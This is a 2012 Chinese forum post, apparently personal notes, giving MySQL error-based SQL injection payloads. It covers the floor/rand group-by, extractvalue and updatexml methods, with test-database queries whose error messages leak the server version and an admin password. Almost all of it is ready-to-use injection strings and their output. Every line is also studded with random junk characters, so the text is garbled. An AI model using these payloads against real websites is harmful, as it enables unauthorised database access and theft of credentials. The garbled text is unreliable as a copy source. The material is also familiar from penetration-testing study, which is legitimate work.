放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
$ V/ w& k* }- |) A P6 h实际测试环境:
; Q6 \; ?0 B& V2 L- b2 l6 {
- n+ i1 \: t* K( L- v ; K5 Z1 Y: r& h& L- \
mysql> show tables;6 n; p6 F) j4 e6 B# [1 P4 w. W
+----------------+& }9 J& K+ s, Q# b6 H0 P
| Tables_in_test |
' L: D, c9 l, n8 t7 ]+----------------+
1 d ~4 P6 ?9 w+ R| admin |
# H- w& s1 M7 M+ V8 X0 ]. E1 b9 O| article |
4 R* [5 V0 N/ I0 Q# c3 T1 m+----------------+
% J6 U! e8 _0 Y3 D& X, Y 1 F H$ U- r1 j
y o+ @7 V; F x/ ^( j$ c" L
2 Y% g3 R+ ^' r; Z3 Smysql> describe admin;% I: O' T( i* n0 }+ j9 M' @" p
+-------+------------------+------+-----+---------+----------------+) M, Y7 m, O, R$ p( V
| Field | Type | Null | Key | Default | Extra |/ \# v8 I( P- ~0 k, u
+-------+------------------+------+-----+---------+----------------+6 u# k- Z: J& ?! W& A9 @
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
0 t1 h# i) d g7 W0 y' q| user | varchar(50) | NO | | NULL | |
# P; q* {; o3 ?6 H$ s| pass | varchar(50) | NO | | NULL | |5 Z: H3 G+ q& l
+-------+------------------+------+-----+---------+----------------+3 B; g7 V( \5 ~1 v( b
# I% |2 z5 H# a, ~4 { z% [# k9 A ) ?, h7 s& j4 j, Z/ k, z# C8 U |
8 ]- N0 T/ W$ D4 R- U: [
mysql> describe article;1 `0 G; ^ q N4 D# O8 S
+---------+------------------+------+-----+---------+----------------+
~ g. n6 @# ]1 y4 U| Field | Type | Null | Key | Default | Extra |
% f1 b3 \& X: c, C9 @/ C2 p* B+---------+------------------+------+-----+---------+----------------+$ C R& P1 Y$ r
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |4 Q" z% k8 G4 }: G \( E- @
| title | varchar(50) | NO | | NULL | |" l- H" m2 k4 }) g5 V+ `
| content | varchar(50) | NO | | NULL | |9 G( o( H+ ^; f0 x. X/ f
+---------+------------------+------+-----+---------+----------------+
`8 A4 Q/ I) x3 B, u* E+ @, Q1、通过floor报错
4 e3 D9 G9 x, b. z! V: Y5 M7 r% L可以通过如下一些利用代码6 ]) B; U( s7 v
$ B# B5 G: q! Q) K; f6 N) M ; v' M/ p9 y* H6 @& Y- s
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
6 I! {9 \: A' C4 W) ifrom information_schema.tables group by x)a);
6 d# R# p- Q o9 ?
4 e, P$ k) A* P8 F / t) N9 o3 }. B( L5 x4 j/ c
and (select count(*) from (select 1 union select null union select !1)x% s: D0 K6 A d- N# _
group by concat((select table_name from information_schema.tables limit 1)," W( D: [( M2 a1 w) D
floor(rand(0)*2)));
D: B, B( T1 J0 r! ^0 S( H# }' h举例如下:
4 j. H, \) \1 N首先进行正常查询:" z1 W1 n: L' I: e9 d% h! n0 d
0 q* D3 c3 O! g! l0 }% Imysql> select * from article where id = 1;' ~* n' E. _& u% l8 S' R
+----+-------+---------+. j- w4 _: f9 {% P( }/ L
| id | title | content |
7 L7 ?9 @6 [$ x, {' S9 W+----+-------+---------+
+ o% O* M% P0 {9 w( I! `| 1 | test | do it |. F; m: K6 E8 E: }1 j
+----+-------+---------+! _, |0 x2 t. ~. `2 x
假如id输入存在注入的话,可以通过如下语句进行报错。+ K1 m8 T' P) ~# N6 F# N
& w$ g% z5 v$ e0 v& ?( M2 @
1 B5 F6 j6 T1 R& nmysql> select * from article where id = 1 and (select 1 from
% O( f3 q: D) O0 h(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
; J2 ~% |5 k. o# ~( gERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
: e# P) [3 [2 h) ?; Q可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。* k2 M/ o; t/ Z& b, a2 O
例如我们需要查询管理员用户名和密码:
- ?2 W7 p& I8 O5 o" \' j6 }Method1: k c" b$ [0 Y a. Y" i7 V/ G. r6 K7 h
3 I# [8 ` _% i N4 B0 ^
8 H Z* L% R" S* G" A
mysql> select * from article where id = 1 and (select 1 from$ W) k9 s; _2 m
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x. a* b) G* h: @
from information_schema.tables group by x)a);
u* z5 \% p2 sERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
5 O4 I! j5 C1 {9 `) y9 Q, `: vMethod2:
# s! V5 |' Q% U
$ \! j2 |+ H9 u1 s7 G) e
% F: ^3 C6 ~3 c( ~- _9 Zmysql> select * from article where id = 1 and (select count(*)8 h0 J/ J6 j- T0 C
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),# a* z9 T. T2 K
floor(rand(0)*2)));! D7 A- `# d( r+ s9 B% j
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
, }' i. V$ e: {% g4 ~2、ExtractValue
! {; I" z5 |4 t5 a& \' t: q6 _测试语句如下) n% ~; ?3 f/ m( k# m
6 x; i* W1 Q+ c- {' P) e; S$ L ' n$ ~& {: J& y9 {/ |7 p
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
+ q0 ? N$ G% _( [2 [( W实际测试过程
* Q% K" D4 g- U' F
8 P- ?- S& L1 Y" B
3 M: {; [ z: a0 r$ j) m3 Xmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,& F, _1 z; U F: f! q5 M0 \
(select pass from admin limit 1)));--. H) {3 _1 o, l# r6 t0 I
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
( {6 d. P/ R- m" C3、UpdateXml
7 g# ~' d% S v' _; |: }. i: w% [测试语句
, F8 Z7 V9 S0 ]
, Z( K) d$ z! f0 ]8 m
: y) V% u; A; T4 w9 Q$ T0 c9 B; o+ cand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
* T$ ]' y6 ?% }' W$ ?实际测试过程
& `& K& m( z% e- u' Q 5 }! R8 P* P( T
+ X1 U' M' U' ]$ Y: ~3 ymysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,0 s' s! w4 o- c4 q" m. i
(select pass from admin limit 1),0x5e24),1));3 t" i% q# x* X
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
6 A& X) C: h* {- DAll, thanks foreign guys.
3 e5 z, E' h3 Y" K" s5 Q C ' d+ B; E1 Z6 D, S$ O$ W d( \5 H
7 v) J+ d. I6 p* O; s2 i
|
发表于 2012-12-10 10:28:51
收藏
支持
反对